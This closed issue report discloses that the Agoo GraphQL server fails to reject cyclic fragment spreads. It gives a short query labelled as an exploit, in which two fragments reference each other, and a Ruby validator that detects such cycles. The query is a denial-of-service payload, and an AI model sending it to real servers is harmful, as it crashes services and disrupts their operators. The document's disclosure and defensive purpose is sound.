Closed
Description
Agoo currently does not support request validation, meaning cyclic fragment requests lead to unbounded results, causing instances of Agoo to crash.

Sample exploit script:

```graphql
query test {
  __schema {
    ...A
  }
}

fragment A on __Schema {
  types {
    fields {
      name
    }
  }
  ...B
}

fragment B on __Schema {
  ...A
}
```
For more information see: https://github.com/nicholasaleks/graphql-threat-matrix/blob/master/implementations/agoo.md
Spec ref: https://spec.graphql.org/October2021/#sec-Fragment-spreads-must-not-form-cycles
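The validation rule the spec reference describes, as an added example that is not part of the issue or of Agoo's own code: it extracts the fragment spread graph from a query string with a light regex-based tokeniser (an assumption; a real server would walk its parsed AST) and rejects the document when a spread leads back to a fragment already being expanded. The sample document is the issue's reproduction, reflowed onto fewer lines.

```ruby
# Constructed from the issue's reproduction, reformatted onto fewer lines.
SAMPLE_QUERY = <<~GQL
  query test { __schema { ...A } }
  fragment A on __Schema { types { fields { name } } ...B }
  fragment B on __Schema { ...A }
GQL

# Maps each fragment name to the fragment names it spreads, e.g. { "A" => ["B"],
# "B" => ["A"] }. Assumes brace-balanced bodies; inline spreads ("... on Type")
# are skipped because they name no fragment.
def fragment_spreads(query)
  graph = {}
  query.scan(/fragment\s+(\w+)\s+on\s+\w+\s*\{/) do |(name)|
    start = Regexp.last_match.end(0)
    depth, idx = 1, start
    while depth > 0 && idx < query.length
      depth += 1 if query[idx] == "{"
      depth -= 1 if query[idx] == "}"
      idx += 1
    end
    graph[name] = query[start...idx].scan(/\.\.\.\s*(?!on\b)(\w+)/).flatten
  end
  graph
end

# Depth-first search with a "visiting" set: a spread back to a fragment still on
# the current path is a cycle. Returns that path closed on itself, e.g.
# ["A", "B", "A"], or nil when the fragments are acyclic and safe to expand.
def find_fragment_cycle(graph)
  state = {}
  path = []
  visit = lambda do |name|
    # Undefined fragments are a different validation rule; skip them here.
    return nil if !graph.key?(name) || state[name] == :done
    return path[path.index(name)..-1] + [name] if state[name] == :visiting
    state[name] = :visiting
    path.push(name)
    graph[name].each do |child|
      cycle = visit.call(child)
      return cycle if cycle
    end
    path.pop
    state[name] = :done
    nil
  end
  graph.each_key do |name|
    cycle = visit.call(name)
    return cycle if cycle
  end
  nil
end
```

Run against `SAMPLE_QUERY`, `find_fragment_cycle(fragment_spreads(SAMPLE_QUERY))` returns `["A", "B", "A"]`, which is the point at which a server should reject the request instead of expanding it.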